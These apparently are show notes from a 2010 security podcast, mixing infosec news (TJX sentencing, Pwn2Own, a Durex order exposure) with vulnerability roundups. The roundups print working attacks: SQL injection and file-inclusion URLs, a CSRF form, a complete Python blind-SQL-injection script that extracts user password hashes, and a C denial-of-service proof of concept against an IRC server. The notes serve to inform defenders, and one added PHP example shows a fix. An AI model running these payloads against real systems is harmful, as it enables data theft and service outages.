1. Coders/programmers, who write the exploits and malware used by the criminal enterprise. Contrary to popular belief, Chabinsky noted that coders who knowingly take part in a criminal enterprise are not protected by the First Amendment.
2. Distributors, who trade and sell stolen data and act as vouchers for the goods provided by other specialists.
3. Tech experts, who maintain the criminal enterprise’s IT infrastructure, including servers, encryption technologies, databases, and the like.
4. Hackers, who search for and exploit applications, systems and network vulnerabilities.
5. Fraudsters, who create and deploy various social engineering schemes, such as phishing and spam.
6. Hosted systems providers, who offer safe hosting of illicit content servers and sites.
7. Cashiers, who control drop accounts and provide names and accounts to other criminals for a fee.
8. Money mules, who complete wire transfers between bank accounts. The money mules may use student and work visas to travel to the U.S. to open bank accounts.
9. Tellers, who are charged with transferring and laundering illicitly gained proceeds through digital currency services and different world currencies.
10. Organization Leaders, often “people persons” without technical skills. The leaders assemble the team and choose the targets.

News item 2: http://www.computerworld.com/s/article/9174242/Military_warns_of_increasingly_active_cyber_threat_from_China_
On the same day that Google Inc. and the GoDaddy Group Inc. complained about China to a congressional committee, U.S. Navy Admiral Robert Willard appeared before the U.S. House Armed Services Committee with an even stronger warning about cyber-threats posed by China.

Willard’s comments about China received little press attention but were stronger than anything said by either company.

“U.S. military and government networks and computer systems continue to be the target of intrusions that appear to have originated from within the PRC (People’s Republic of China),” said Willard.

He said that most of the intrusions are focused on acquiring data “but the skills being demonstrated would also apply to network attacks.”

Willard testified on the military’s operations in its Pacific command, which he said “faces increasingly active and sophisticated threats to our information and computer infrastructure.”

News item 3: http://www.telegraph.co.uk/news/newstopics/howaboutthat/7532996/Ageing-spies-unable-to-use-the-internet.html
The Security Service is launching an unprecedented round of redundancies to improve the overall level of computer skills among its staff.

Despite an expanding budget, MI5 is laying off employees in order to hire new intelligence officers and support staff with better command of information technology and other “deployable” skills.

The redundancy programme has set tongues wagging in Whitehall, with civil servants in other departments joking about a “James Bond generation” of elderly spies being put out to pasture because they can’t use the internet and don’t understand the world of Twitter or Facebook.

The plan was disclosed by Jonathan Evans, the director-general of MI5. He told a Parliamentary committee that he is concerned that his agency’s overall IT skills are not up to scratch, leading him to get rid of some employees.

News item 4: http://www.kptv.com/news/22964989/detail.html
The theft of a computer from Molalla’s water treatment facility is being considered a federal crime by authorities.  Someone broke into the water plant Saturday night and stole the computer, which was what kept the plant working on auto pilot. Water service to Molalla has not been affected, but workers must operate the plant the old-fashioned way.

“It has to be manually run and also inspected (so) visual checks can be made,” said Marc Howatt, the city’s public works director.

The thieves broke into the water plant through a back window. Once inside, Howatt said, the thief triggered a motion detector and an on-call manager rushed to the facility and found the front door open and one of the computers gone.

The computer contained software that monitored the water pumps, reservoir and chlorine levels. “The software enables ease of operation,” Howatt said. “It allows the operator to log onto a screen and see what’s happening with the plant at any given time during the day.” The following day, workers found the computer in a pond on the property. City officials said it’s destroyed, but a technician is trying to salvage the hard drive and the costly programming on it.

Episode 96 – Durex “Unwanted Child Process”

Play

ISD Podcast Episode 96 for March 26, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.
Announcements:

MyHardDriveDied.com:

SANS Community Atlanta:

SANS Mentoring Program:

  • Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)

Notacon 7

  • April 15th – 18th, 2010 Cleveland, Ohio
  • http://notacon.org/
  • Adrian will be there presenting on Anti-Forensics

Kentuckiana Metasploit Class

  • May 8, 2010 Jeffersonville, Indiana
  • (No URL for that as of yet)
  • Proceeds will be going to the Hackers for Charity Food For Work Program

Friends of the Podcast:

Webhosting services:WebSpeedway

Vulnerabilities of Interest:

    1. justVisual 2.0 (index.php?p=) is subject to a Local File Inclusion (LFI) vulnerability.  Vulnerable code:
      <?php
      ob_start();//;print_r($_GET);
      error_reporting(E_ALL);
      function __autoload($class_name){
          $f=realpath('..').'/classes/'.$class_name.'.php';
          if (file_exists($f))
              require_once $f ;
          else {
              die('File '.$f.' does not exist. Referer: '.(isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : 'none').'<br/>');
          }
      }
      Config::init();
      $xmldb=XmlDb::getInstance();
      $selfname=basename($_SERVER['PHP_SELF'],'.php');
      if(isset($_GET['p']) && !empty($_GET['p'])) {
          //$selfname=basename($_GET['p'],'.php');
          $selfname=str_replace('.php','',$_GET['p']);

          $filepath=dirname(dirname($_SERVER['SCRIPT_FILENAME'])).'/control/'.$selfname.'.php';//echo $selfname;
          if(!file_exists($filepath)) {
              include '../control/defaultcontrol.php';
          }
          else
              include '../control/'.$selfname.'.php';
      }
      Proof of Concept is available: http://www.sample.com/index.php?p=[LFI]

    2. Joomla component com_universal (UWCMS Universal Web CMS) is subject to a Remote File Inclusion (RFI) vulnerability. This affects version 1.0.0.  Vulnerable code: /includes/config/config.html.php

      global $mosConfig_absolute_path;
      require_once($mosConfig_absolute_path."/administrator/components/com_universal/includes/config/configuracion.php");

      Proof of Concept is available: http://www.sample.com/administrator/components/com_universal/includes/config/config.html.php?mosConfig_absolute_path= [sh3ll inj3ct0r]

    3. N-13 News is subject to a File Disclosure vulnerability. Example URL is available: http://www.sample.com/modules/login.php?default_login_language={FILE}
    4. CF Image Hosting Script is subject to a File Disclosure vulnerability. Version 1.0 is impacted.  Example URL is available: http://www.sample.com/?img=../{FILE}
    5. Easy-Clanpage is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Easy-Clanpage 2.2 and versions prior to and including Easy-Clanpage 2.0 are vulnerable; other versions may be affected as well. Example URL is available: http://www.sample.com/[path]/?section=user&action=details&id=-1/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7/**/from/**/ecp_user/**/where/**/userid=1/*
      http://www.sample.com/ecp_version2/?section=user&action=details&func=stats&id=1+and+1=1+and+ascii(substring((SELECT password FROM ecp_user+WHERE+userID=1 LIMIT 0,1),1,1))>1

      The following exploit is available:
      #!/usr/bin/env python
      #-*- coding:utf-8 -*-
      import sys, urllib2, getopt

      def out(str):
          sys.stdout.write(str)
          sys.stdout.flush()

      class Exploit:
          charset = "0123456789abcdefABCDEF"
          url = ""
          charn = 1
          id = 1
          table_prefix = ""
          table_field = ""
          passwd = ""
          columns = []
          find_passwd = True

          def __init__(self):
              if len(sys.argv) < 2:
                  print "*****************************************************************************"
                  print "******************** Easy-Clanpage V2.0 Profil Page Hack ********************"
                  print "*****************************************************************************"
                  print "*                Discovered and vulnerability by Easy Laster                *"
                  print "*                             coded by Dr.ChAoS                             *"
                  print "*****************************************************************************"
                  print "* Usage:                                                                    *"
                  print "* python exploit.py [OPTION...] [SWITCH...] <url>                           *"
                  print "*                                                                           *"
                  print "* Example:                                                                  *"
                  print "*                                                                           *"
                  print "* Get the password of the user with id 2:                                   *"
                  print "* python exploit.py -id 2 http://site.de/ecp/                               *"
                  print "*                                                                           *"
                  print "* Get email and username of id 1:                                           *"
                  print "* python exploit.py -columns 80:email,25:username -nopw http://site.de/ecp/ *"
                  print "*                                                                           *"
                  print "* Switches:                                                                 *"
                  print "* --nopw                                 Search no password                *"
                  print "*                                                                           *"
                  print "* Options:                                                                  *"
                  print "* --id=<user id>                         User id                           *"
                  print "* --prefix=<table prefix>                Table prefix of ECP               *"
                  print "* --columns=<max_chars:column_name,...>  Get value of any column you want  *"
                  print "*****************************************************************************"
                  exit()
              opts, switches = getopt.getopt(sys.argv[1:], "", ["id=", "prefix=", "columns=", "nopw"])
              for opt in opts:
                  if opt[0] == "--id":
                      self.id = int(opt[1])
                  elif opt[0] == "--prefix":
                      self.table_prefix = opt[1]
                  elif opt[0] == "--columns":
                      for col in opt[1].split(","):
                          max, name = col.split(":")
                          self.columns.append([max, name, ""])
                  elif opt[0] == "--nopw":
                      self.find_passwd = False
              for switch in switches:
                  if switch[:4] == "http":
                      if switch[-1:] == "/":
                          self.url = switch
                      else:
                          self.url = switch + "/"

          def generate_url(self, ascii):
              return self.url + "index.php?section=user&action=details&func=stats&id=1+and+1=1+and+ascii(substring((SELECT%20" + self.table_field + "%20FROM%20" + self.table_prefix + "ecp_user%20WHERE%20userID=" + str(self.id) + "%20LIMIT%200,1)," + str(self.charn) + ",1))%3E" + str(ord(ascii))

          def start(self):
              print "Exploiting..."
              if self.find_passwd:
                  self.password()
              if len(self.columns) > 0:
                  self.read_columns()
              print "All finished!\n"
              print "------ Results ------"
              if len(self.columns) > 0:
                  for v in self.columns:
                      print "Column \"" + v[1] + "\": " + v[2]
              if self.find_passwd:
                  if len(self.passwd) == 32:
                      print "Password: " + self.passwd
                  else:
                      print "Password not found!"
              print "--------------------"

          def read_columns(self):
              end = False
              charrange = [0]
              charrange.extend(range(32, 256))
              for i in range(len(self.columns)):
                  out("Getting value of \"" + self.columns[i][1] + "\": ")
                  self.table_field = self.columns[i][1]
                  for pwc in range(1, int(self.columns[i][0]) + 1):
                      if end == True:
                          break
                      self.charn = pwc
                      end = False
                      for c in charrange:
                          src = urllib2.urlopen(self.generate_url(chr(c))).read()
                          if "<b>Warning</b>:  mysql_result() [" in src:
                              if c == 0:
                                  end = True
                              else:
                                  self.columns[i][2] += chr(c)
                                  out(chr(c))
                              break
                  out("\n")

          def password(self):
              out("Getting password: ")
              self.table_field = "password"
              for pwc in range(1, 33):
                  self.charn = pwc
                  for c in self.charset:
                      src = urllib2.urlopen(self.generate_url(c)).read()
                      if "<b>Warning</b>:  mysql_result() [" in src:
                          self.passwd += c
                          out(c)
                          break
              out("\n")

      exploit = Exploit()
      exploit.start()

    6. JINAIS is subject to a remote denial-of-service vulnerability. An attacker may exploit this issue to crash the application, resulting in a denial-of-service condition. JINAIS 0.1.8 is vulnerable; other versions may also be affected. Exploit code is available:
      /*
      Jinais IRC Server 0.1.8 - NULL Pointer PoC

      This PoC will disconnect the affected target IRC server using
      a NULL Pointer vulnerability.

      Copyright 2010 Salvatore Fresta aka Drosophila

      This program is free software; you can redistribute it and/or
      modify it under the terms of  the  GNU General Public License
      as published by the  Free Software Foundation; either version
      2 of the License, or (at your option) any later version.

      This program  is  distributed  in the hope  that  it  will be
      useful, but WITHOUT ANY WARRANTY;  without  even the  implied
      warranty  of  MERCHANTABILITY  or  FITNESS  FOR  A PARTICULAR
      PURPOSE. See the GNU General Public License for more details.

      You should have  received a copy  of  the  GNU General Public
      License along  with  this program;  if not, write to the Free
      Software Foundation,Inc., 59 Temple Place, Suite 330, Boston,
      MA 02111-1307 USA

      http://www.gnu.org/licenses/gpl-2.0.txt

      */

      #include <stdio.h>
      #include <string.h>
      #include <getopt.h>
      #include <stdlib.h>
      #include <time.h>
      #ifdef WIN32
      #include <winsock.h>
      #define close closesocket
      #else
      #include <sys/types.h>
      #include <sys/socket.h>
      #include <netinet/in.h>
      #include <sys/select.h>
      #include <unistd.h>
      #include <errno.h>
      #include <netdb.h>
      #endif

      #define BUFF_SIZE 256
      #define DEFAULT_PORT 4002

      int socket_connect(char *server, int port);
      char *socket_receive(int sock, int tout);
      int socket_send(int socket, char *buffer, size_t size);
      int socket_close(int socket);

      int main(int argc, char *argv[]) {

      int sd,
      rnd_num,
      len,
      port = DEFAULT_PORT;
      char pkg[BUFF_SIZE],
      *response = NULL,
      *host = NULL;

      if(argc < 2) {
      printf("\nJinais IRC Server 0.1.8 NULL Pointer PoC - (c) Salvatore Fresta"
      "\nhttp://www.salvatorefresta.net"
      "\n"
      "\nUsage: %s <target_hostname> <port> (default: %d)\n\n", argv[0], port);
      return -1;
      }

      srand(time(NULL));

      host = argv[1];
      if(argc > 2) port = atoi(argv[2]);

      printf("\nJinais IRC Server 0.1.8 NULL Pointer PoC - (c) Salvatore Fresta"
      "\nhttp://www.salvatorefresta.net"
      "\n\n[*] Connecting to %s:%d...", host, port);

      sd = socket_connect(host, port);
      if(sd < 0) {
      printf("\n[-] Error on connect!\n\n");
      return -1;
      }

      printf("\n[+] Connection established"
      "\n[*] Logging in to IRC server...");

      login:

      rnd_num = rand()%100+1;

      len = snprintf(pkg, sizeof(pkg), "NICK randomnickname%d\r\n", rnd_num);
      if(len < 0 || (size_t)len >= sizeof(pkg)) {
      perror("\n[-] Error: snprintf");
      socket_close(sd);
      return -1;
      }

      if(socket_send(sd, pkg, len) < 0) {
      perror("\n[-] Error: socket_send");
      socket_close(sd);
      return -1;
      }

      response = socket_receive(sd, 3);
      if(!response) {
      perror("\n[-] Error: socket_receive");
      socket_close(sd);
      return -1;
      }

      if(strstr(response, "Nickname is already in use")) {
      free(response);
      goto login;
      }
      free(response);

      printf("\n[+] Login successful"
      "\n[*] Data sending...");

      rnd_num = rand()%100+1;
      len = snprintf(pkg, sizeof(pkg), "USER blabla\r\nTOPIC #ch%d\r\n", rnd_num);
      if(len < 0 || (size_t)len >= sizeof(pkg)) {
      perror("\n[-] Error: snprintf");
      socket_close(sd);
      return -1;
      }

      if(socket_send(sd, pkg, len) < 0) {
      perror("\n[-] Error: socket_send");
      socket_close(sd);
      return -1;
      }

      response = socket_receive(sd, 3);
      if(!response) {
      perror("\n[-] Error: socket_receive");
      socket_close(sd);
      return -1;
      }

      socket_close(sd);

      printf("\n[+] Data sent successfully"
      "\n[+] Connection closed\n\n");

      return 0;

      }

      int socket_connect(char *server, int port) {

      int sd;
      struct sockaddr_in sock;
      struct hostent *host = NULL;

      #ifdef WIN32
      WSADATA wsadata;
      if(WSAStartup(MAKEWORD(1,0), &wsadata)) return -1;
      #endif

      memset(&sock, 0, sizeof(sock));

      if((sd = socket(AF_INET, SOCK_STREAM, 0)) < 0) return -1;

      sock.sin_family = AF_INET;
      sock.sin_port = htons(port);

      if(!(host=gethostbyname(server))) return -1;

      sock.sin_addr = *((struct in_addr *)host->h_addr);

      if(connect(sd, (struct sockaddr *) &sock, sizeof(sock)) < 0) return -1;

      return sd;

      }

      char *socket_receive(int sock, int tout) {

      int ret,
      byte_recv,
      oldpkglen = 0,
      pkglen = 0;
      char *buffer = NULL,
      tmp[128];
      struct timeval timeout;
      fd_set input;

      if(sock < 0) return NULL;

      while (1) {

      FD_ZERO(&input);
      FD_SET(sock, &input);

      if(tout > 0) {
      timeout.tv_sec  = tout;
      timeout.tv_usec = 0;
      ret = select(sock + 1, &input, NULL, NULL, &timeout);
      }
      else
      ret = select(sock + 1, &input, NULL, NULL, NULL);

      if (!ret) break;
      if (ret < 0) return NULL;

      byte_recv = recv(sock, tmp, sizeof(tmp), 0);

      if(byte_recv < 0) return NULL;

      if(!byte_recv) break;

      oldpkglen = pkglen;
      pkglen += byte_recv;

      buffer = (char *) realloc(buffer, pkglen+1);

      if(!buffer) return NULL;

      memcpy(buffer+oldpkglen, tmp, byte_recv);

      }

      if(buffer) buffer[pkglen] = 0;

      return buffer;

      }

      int socket_send(int socket, char *buffer, size_t size) {

      if(socket < 0) return -1;

      return send(socket, buffer, size, 0) < 0 ? -1 : 0;

      }

      int socket_close(int socket) {

      if(socket < 0) return -1;

      return close(socket) < 0 ? -1 : 0;

      }

    7. New-CMS is subject to a local file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. New-CMS 1.21 and prior are vulnerable. Example URL is available: http://www.sample.com/index.php?pg=[LFI]
    8. From the Pwn2Own Contest: Microsoft Internet Explorer is subject to multiple unspecified remote code-execution vulnerabilities. Successful exploits will allow an attacker to run arbitrary code in the context of the user running the application. Failed attacks may cause denial-of-service conditions. The vulnerabilities affect Internet Explorer 8; other versions may be vulnerable as well. The researcher responsible for discovering these issues has developed exploit code to trigger the vulnerabilities. This exploit code is not known to be publicly available.
    9. From the Pwn2Own Contest: Apple Safari is prone to an unspecified remote code-execution vulnerability. Successful exploits will allow an attacker to run arbitrary code in the context of the user running the application. Failed attacks may cause denial-of-service conditions. This vulnerability affects Apple Safari 4 versions running on the Mac OS X platform; other versions may be vulnerable as well. The researcher responsible for discovering this issue has developed exploit code to trigger this vulnerability. This exploit code is not known to be publicly available.
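Items 1 and 7 above both hand a GET parameter straight to include, and stripping ".php" (as justVisual does) does nothing against "../" or a "%00" truncation. As an added example, not code from justVisual, New-CMS or this post, here is the same "../control/<name>.php" dispatch written so that only a known controller name can ever be included; the names in ALLOWED_CONTROLLERS, the directory layout and PHP 7.1+ are assumptions.

```php
<?php
// Added example, not justVisual's code. Assumed layout: this front page lives
// in <app>/public/, controllers in <app>/control/<name>.php.

// Assumed allowlist of controllers this page may dispatch to.
const ALLOWED_CONTROLLERS = ['defaultcontrol', 'stats', 'user'];

/**
 * Map the "p" parameter to a controller file, or return null if it is unsafe.
 *
 * Differences from the vulnerable loader:
 *  - the name must match a strict pattern, so "../", "%00", slashes and
 *    absolute paths are rejected before any filesystem call is made;
 *  - the name must be in an explicit allowlist;
 *  - the resolved path is checked with realpath() to lie directly inside the
 *    control directory, a second layer in case the allowlist is ever widened.
 */
function resolve_controller(?string $p, string $controlDir): ?string
{
    if ($p === null || $p === '') {
        return $controlDir . '/defaultcontrol.php';
    }

    // Drop one optional trailing ".php", as the original did, then validate
    // what is left. \z (not $) so a trailing newline cannot slip through.
    $name = preg_replace('/\.php\z/', '', $p, 1);
    if (!preg_match('/^[a-z0-9_]{1,32}\z/', $name)) {
        return null;
    }
    if (!in_array($name, ALLOWED_CONTROLLERS, true)) {
        return null;
    }

    $base = realpath($controlDir);
    $file = realpath($controlDir . '/' . $name . '.php');
    if ($base === false || $file === false) {
        return null;                  // directory or controller does not exist
    }
    // Containment: the resolved file must sit directly under $base.
    if (strncmp($file, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $file;
}

// Dispatch. Unknown or unsafe names fall back to the default controller and a
// 404; the attacker-supplied value is never echoed, unlike the original die().
$p = $_GET['p'] ?? null;
if (!is_string($p)) {                 // ?p[]=x would otherwise be an array
    $p = null;
}
$controlDir = dirname(__DIR__) . '/control';
$target = resolve_controller($p, $controlDir);
if ($target === null) {
    http_response_code(404);
    $target = $controlDir . '/defaultcontrol.php';
}
require $target;
```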

Stories of Interest:
News item 1: http://www.wired.com/threatlevel/2010/03/tjx-sentencing/
Convicted TJX hacker Albert Gonzalez was sentenced to 20 years in prison on Thursday for leading a gang of cyberthieves who stole more than 90 million credit and debit card numbers from TJX and other retailers.

The sentence for the largest computer-crime case ever prosecuted is the lengthiest ever imposed in the United States for hacking or identity-theft. Gonzalez was also fined $25,000. Restitution, which will likely be in the tens of millions, was not decided Thursday.

Clean-cut, wearing a beige jail uniform and wireframe glasses, the 28-year-old Gonzalez sat motionless at his chair during Thursday’s proceedings, his hands folded in front of him.

Before the sentence was pronounced, Gonzalez told the court he deeply regrets his crimes, and is remorseful for having taken advantage of the personal relationships he’d forged. “Particularly one I had with a certain government agency – that gave me a second chance in life,” said the hacker, who had worked as a paid informant for the Secret Service. “I blame nobody but myself.”

News item 2: http://www.nytimes.com/2010/03/21/world/asia/21grid.html
It came as a surprise this month to Wang Jianwei, a graduate engineering student in Liaoning, China, that he had been described as a potential cyberwarrior before the United States Congress.

Larry M. Wortzel, a military strategist and China specialist, told the House Foreign Affairs Committee on March 10th that it should be concerned because “Chinese researchers at the Institute of Systems Engineering of Dalian University of Technology published a paper on how to attack a small U.S. power grid sub-network in a way that would cause a cascading failure of the entire U.S.”

When reached by telephone, Mr. Wang said he and his professor had indeed published “Cascade-Based Attack Vulnerability on the U.S. Power Grid” in an international journal called Safety Science last spring. But Mr. Wang said he had simply been trying to find ways to enhance the stability of power grids by exploring potential vulnerabilities.

“We usually say ‘attack’ so you can see what would happen,” he said. “My emphasis is on how you can protect this. My goal is to find a solution to make the network safer and better protected.” And independent American scientists who read his paper said it was true: Mr. Wang’s work was a conventional technical exercise that in no way could be used to take down a power grid.

News item 3: http://www.computerworld.com/s/article/9174078/iPhone_Safari_IE8_Firefox_all_fall_on_day_one_of_Pwn2Own?taxonomyId=17
Hackers took down Apple’s iPhone and Safari browser, Microsoft’s Internet Explorer 8 (IE8) and Mozilla’s Firefox within minutes at today’s Pwn2Own contest, as expected.

The two-man team of Vincenzo Iozzo and Ralf-Philipp Weinmann exploited the iPhone in under five minutes, said a spokeswoman for 3Com TippingPoint, the security company that sponsored the contest. The pair also walked away with $15,000 in cash, a record prize for the challenge, which is in its fourth year.

Iozzo, an Italian college student, works for Zynamics GmbH, the company headed by noted researcher Thomas Dullien, better known as Halvar Flake, while Weinmann is a post-doctoral researcher at the Laboratory of Algorithms, Cryptology and Security at the University of Luxembourg.

Weinmann is probably best known for being part of a three-man team that in 2007 demonstrated how to crack the Wi-Fi security protocol WEP much faster than previously thought possible.

News item 4: https://www.infosecisland.com/articleview/3392-Durex-condom-orders-exposed-on-the-Internet.html

Earlier we talked about a security problem involving the web site of a Durex product. On March 5, a customer reportedly discovered that anyone could view his and other customers’ orders on the kohinoorpassion.com web site by simply inserting a different order ID number in the url without any login required. Names, addresses, phone numbers, and type of products ordered were all there for ready viewing. The orders had not been placed on the kohinoorpassion.com web site, but on the Durex India e-store site.

From what the customer could determine, the earliest order exposed online dated back to February 23, 2009, but there is no confirmation as to for how long the customer records might have been accessible without a login. According to the customer’s web site about the breach, no credit card or financial data were exposed.

The customer reported that he promptly contacted TTK-LIG (the marketer of the Durex brand in India and manufacturer of Kohinoor condoms) and SSL International (the owner of the Durex brand worldwide) about the problem and that by the next day, the site appeared to be better secured. But that wasn’t the end of the story, it seems. The customer created his own web site and FAQ about the breach and has been updating it since then. A review of the updates suggests that things took an ugly turn within a matter of weeks.

Episode 95 – OuterZone Review

Play

ISD Podcast Episode 95 for March 25, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.

Announcements:

MyHardDriveDied.com:

SANS Community Atlanta:

SANS Mentoring Program:

  • Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)

Notacon 7

  • April 15th – 18th, 2010 Cleveland, Ohio
  • http://notacon.org/
  • Adrian will be there presenting on Anti-Forensics

Kentuckiana Metasploit Class

  • May 8, 2010 Jeffersonville, Indiana
  • (No URL for that as of yet)
  • Proceeds will be going to the Hackers for Charity Food For Work Program

Friends of the Podcast:

Webhosting services:WebSpeedway

Vulnerabilities of Interest:

  1. uhttp Server is subject to a Path Traversal vulnerability. Version 0.1.0-alpha is affected, though others may be as well.  The problem is in the management of the bad chars that can be used to launch some attacks, such as the directory traversal. The path traversal sequence (‘../’) is not checked, so it can be used for seeking the directories of the affected system.  Example URL is available: http://www.sample.com/GET /../../../../../../etc/passwd HTTP/1.1
  2. Harris Stratex 2100 subscriber station is subject to a Cross Site Request Forgery vulnerability.  This vulnerability would allow an attacker to view the running configuration without authentication.  Version 3.0.4.1.7.C is impacted.  Example HTML code is available:
    <html>
    <body>
    <body xonload="config.submit();">
    <form method="get"
    action="http:192.168.1.1/frameCmd6.html">
    <input value="Current Configuration">
    </form>
    </body>
    </html>
  3. The Joomla Component com_gds is subject to a SQL Injection vulnerability.  Example URL is available: http://www.sample.com/index.php?option=com_gds&task=store&Storeid=-1+UNION+SELECT+1,2,3,4,5,6–
  4. The Joomla Component com_cx is subject to a SQL Injection vulnerability.  Example URL is available: http://www.sample.com/index.php?option=com_cx&task=postview&postid=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41–
  5. The Joomla Component J!Research is subject to a Local File Inclusion (LFI) vulnerability.  This could be exploited by an attacker to expose sensitive data.  Example URL is available: http://www.sample.com/index.php?option=com_jresearch&controller=../../../../../../../../../../proc/self/environ%00
  6. The Joomla Component com_cb is subject to a SQL Injection vulnerability because it fails to sanitize user supplied inputs used in a SQL query.  Example URL is available: http://www.sample.com/index.php?option=com_cb&task=list&cat=-1+UNION+SELECT+1,2,3,4,5–.
  7. The Joomla Component SMEStorage is subject to a Local File Inclusion (LFI) vulnerability.  Example URL is available: http://www.sample.com/index.php?option=com_smestorage&controller=[LFI]%00
  8. The Joomla Component com_jwmmxtd is subject to a Remote File Inclusion (RFI) vulnerability.  Example URL is available: http://www.sample.com/administrator/components/com_jwmmxtd/admin.jwmmxtd.php?mosConfig_absolute_path= [inj3ct0r]

OuterZone Review

http://dc949.org/projects/floodgate/

